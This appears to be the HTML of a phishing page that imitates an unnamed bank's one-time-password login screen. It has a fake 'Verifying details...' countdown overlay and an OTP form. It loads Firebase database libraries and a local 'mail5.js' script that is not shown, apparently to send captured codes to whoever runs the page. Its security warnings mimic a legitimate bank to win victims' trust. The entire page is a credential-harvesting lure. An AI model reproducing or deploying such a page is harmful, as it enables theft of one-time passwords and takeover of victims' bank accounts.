<html>

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>Hfrrhbrufb</title>
    <meta name="theme-color" content="#000000">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link
        href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&amp;display=swap"
        rel="stylesheet">
    <link rel="manifest" href="/manifest.json">
    <meta name="msapplication-config" content="/browserconfig.xml">
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
    <script defer="defer" src="/static/js/main.6418afb3.js"></script>
    <link href="style.css" rel="stylesheet">
    <script src="loading.js"></script>
</head>
<style>
    .loader25 {
            position: fixed;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            background-color: #f3f3f3;
            z-index: 9999;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
        }

        .spinner25 {
            width: 47px;
            height: 47px;
            border: 4px solid blue;
            border-top: 6px solid transparent;
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }

        .loader-text25 {
            margin-top: 15px;
            font-size: 14px;
            color: #333;
            font-weight: 500;
        }

        .countdown25 {
            margin-top: 10px;
            font-size: 18px;
            font-weight: 500;
            color: #333;
        }

        /* Spinner animation */
        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>

<body>
    <div id="loader25" class="loader25">
        <div class="spinner25"></div>
        <p class="loader-text25">Verifying details...</p>
        <p id="countdown25" class="countdown25">00:10</p>
    </div>
    <noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root">
        <div>
            <div class="hsmain" style="display: block;">
                <header class="Tpv_logo__La5jG"><a href="/"><img alt="cMIF2W" width="150" src="/img/xdfr_yglogo.png"
                            style="color: transparent;"></a></header>
                <div class="Tpv_login_heading__E5J6K">
                    <h3 class="Tpv_login_heading_h3__z0Qx1">Continue with One Time Password</h3>
                </div>
                <div class="Tpv_login_form___9zpm">
                    <p class="Tpv_content_title__SWlCq">One-time password sent to your registered mobile number</p>
                    <p class="Tpv_mandatory_txt__YZHLO">Required fields an asterisk (*)</p>
                    <form class="Tpv_form__okPRU" id="otpform">
                        <div class="Tpv_form_group__aHWg0"><label class="Tpv_label__cObJz">One-time password<span
                                    class="Tpv_info_span__oB9oh"> *</span></label><input id="userotp" class="Tpv_form_control__5hzGF"
                                required="" minlength="4" maxlength="8" type="text" name="PP1"></div>
                        <div class="Tpv_t_center__8YF86"><input class="Tpv_btn_default__TMlv_" type="submit"
                                value="LOGIN"></div>
                    </form>
                    <div class="Tpv_t_center__8YF86">
                        <div id="timer">2:59</div>
                    </div>
                    <div class="Tpv_t_center__8YF86">
                        <p>If you haven't received a one-time password on your mobile phone, &nbsp;<span
                                class="Tpv_btn_resend__L6Fku">click here to resend</span></p>
                    </div>
                    <div class="Tpv_info_panel__qNS7i">
                        <div class="Tpv_notify_icon__7fP0C">
                            <ul>
                                <li>Please be aware that all call, SMS, email related be sent to your registered mobile
                                    number.</li>
                                <li>We never contact you via email, SMS, or phone calls to request your personal
                                    information.</li>
                                <li>Please do not respond to suspicious SMS, calls, and emails. Kindly report any such
                                    suspicious activity immediately.</li>
                            </ul>
                        </div>
                    </div>
                </div>
                <div></div>
                <div class="Tpv_p_body__VIl_Q">
                    <ul class="Tpv_provide__KIDMh">
                        <li>Required fields are marked with an asterisk (*).</li>
                        <li>Please do not share your user ID and password with anyone.</li>
                        <li>Username and password are sensitive. Share them carefully!</li>
                    </ul>
                </div>
                <div class="Tpv_footer_area__vmfML"><img alt="599OM4" loading="lazy" width="68" height="28"
                        decoding="async" data-nimg="1" src="/img/sign.png" style="color: transparent;"></div>
                <div class="Tpv_footer__uSut5">
                    <p>© Copyright</p>
                </div>
            </div>
        </div>
    </div>
    <script src="https://www.gstatic.com/firebasejs/8.6.8/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.6.8/firebase-database.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/cleave.js/1.6.0/cleave.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="mail5.js"></script>
</body>

</html>